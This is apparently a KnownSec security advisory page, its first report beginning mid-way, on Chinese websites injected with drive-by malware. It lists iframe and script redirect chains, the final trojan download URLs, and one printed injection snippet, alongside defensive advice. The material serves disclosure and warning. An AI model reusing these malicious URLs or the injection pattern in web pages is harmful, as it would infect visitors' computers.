        [iframe]http://cnzz02.8866.org/aa/360.htm
            [script]http://cnzz02.8866.org/aa/ll.jpg
            [script]http://cnzz02.8866.org/aa/ll1.jpg
            [script]http://cnzz02.8866.org/aa/lll.jpg
                [exe]http://11.xinhh20.com/w/qq.exe
            [script]http://cnzz02.8866.org/aa/llll1.jpg
            [script]http://cnzz02.8866.org/aa/llll.jpg
            [script]http://cnzz02.8866.org/aa/lllll.jpg
    [script]http://www.pcbeta.com/batch.panel.php?rand=672760
        [iframe]http://cnzz02.8866.org/aa/b107.htm

最终下载病毒文件：
http://11.xinhh20.com/w/qq.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Sun Nov 8 2009 21:37:06 UTC+0800
最后更新时间：Sun Nov 8 2009 21:37:06 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 任我游网（http://www.renwoyou.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.renwoyou.com/templates/new_digg/images/city.htm?tianxia

网页被嵌入恶意链接代码：
<SCRIPT LANGUAGE=”JavaScript”>
<!– Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// –>
</SCRIPT>
<script src=”top.jpg”></script>
<body id=”DivID”></body>
<script src=”ufo.jpg”></script>
<script src=”right.jpg”></script>
<script src=”left.jpg”></script>

挂马分析：
[root]http://www.renwoyou.com/
    [script]http://www.renwoyou.com/templates/new_digg/js/tip.js
        [script]http://www.renwoyou.com/images/top.gif
            [iframe]http://www.renwoyou.com/templates/new_digg/images/city.htm?tianxia
                [script]http://www.renwoyou.com/templates/new_digg/images/top.jpg
                [script]http://www.renwoyou.com/templates/new_digg/images/ufo.jpg
                    [exe]http://uc.yi71.com/data/az.exe
                [script]http://www.renwoyou.com/templates/new_digg/images/right.jpg
                [script]http://www.renwoyou.com/templates/new_digg/images/left.jpg
最终下载病毒文件：
http://uc.yi71.com/data/az.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：8
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]